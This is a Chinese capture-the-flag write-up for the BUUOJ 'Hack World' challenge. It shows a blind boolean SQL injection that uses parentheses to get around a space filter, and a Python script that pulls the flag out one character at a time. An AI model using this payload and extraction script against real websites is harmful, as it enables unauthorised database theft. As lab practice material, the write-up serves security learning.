题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World
SQL注入
手工测试时发现有过滤,那就先Fuzz测试过滤了哪些字符
Length=482
的都是被过滤的字符
测试注入点,发现是盲注,直接查flag
表flag字段的内容
Trick
- 使用中括号
()
代替空格 - 常规盲注测试,都无需查库查表查字段了,都给出来,直接查flag内容
id=(select(ascii(mid(flag,1,1))=102)from(flag))
编写脚本
# -*- coding:utf-8 -*-
# Author: mochu7
import requests
import string
def blind_injection(url):
flag = ''
strings = string.printable
for num in range(1,60):
for i in strings:
payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))
post_data = {"id":payload}
res = requests.post(url=url,data=post_data)
if 'Hello' in res.text:
flag += i
print(flag)
else:
continue
print(flag)
if __name__ == '__main__':
url = 'http://64368c9f-dd87-4c49-b9a1-d4b82e98c87a.node3.buuoj.cn/index.php'
blind_injection(url)